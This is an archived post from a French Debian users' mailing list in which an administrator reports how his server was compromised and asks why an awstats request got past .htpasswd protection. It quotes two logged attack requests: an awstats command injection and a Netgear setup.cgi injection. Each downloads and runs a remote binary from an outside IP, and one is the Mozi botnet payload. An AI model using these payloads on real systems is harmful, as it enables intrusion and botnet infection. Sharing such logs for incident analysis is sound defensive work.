Re: Machine vérolée

To: debian-user-french@lists.debian.org
Subject: Re: Machine vérolée
From: BERTRAND Joël <joel.bertrand@systella.fr>
Date: Sun, 25 Jun 2023 20:03:30 +0200
Message-id: <[🔎] 618e2896-b1f0-6938-30ae-a950ba46a175@systella.fr>
In-reply-to: <[🔎] 36a828eb-f684-3c62-7759-5dc9ad7ccbcb@systella.fr>
References: <[🔎] b8975793-7a70-d931-ea65-44e8b0cc65f5@systella.fr> <[🔎] 87a5wqplse.fsf@free.fr> <[🔎] 36a828eb-f684-3c62-7759-5dc9ad7ccbcb@systella.fr>

Porte d'entrée trouvée :

GET
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20131%2e220%2e92%2e80%2fcacat%3bchmod%20%2bx%20cacat%3b%2e%2fcacat%20216%2e102%2e212%2e115;echo%20YYY;echo|
 HTTP/1.1\n"

"GET
/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://27.45.37.235:51873/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
HTTP/1.0"

La seconde requête échoue (firewall sortant et script inexistant). Ce
que je ne saisis pas, c'est pourquoi la première est passée, awstats
étant protégé par .htpasswd.

JB

Reply to:

Follow-Ups:
- Re: Machine vérolée
  - From: Sébastien Dinot <sebastien.dinot@free.fr>

References:
- Machine vérolée
  - From: BERTRAND Joël <joel.bertrand@systella.fr>
- Re: Machine vérolée
  - From: Michel Verdier <mv524@free.fr>
- Re: Machine vérolée
  - From: BERTRAND Joël <joel.bertrand@systella.fr>

Prev by Date: Re: Machine vérolée
Next by Date: Re: Machine vérolée
Previous by thread: Re: Machine vérolée
Next by thread: Re: Machine vérolée
Index(es):
- Date
- Thread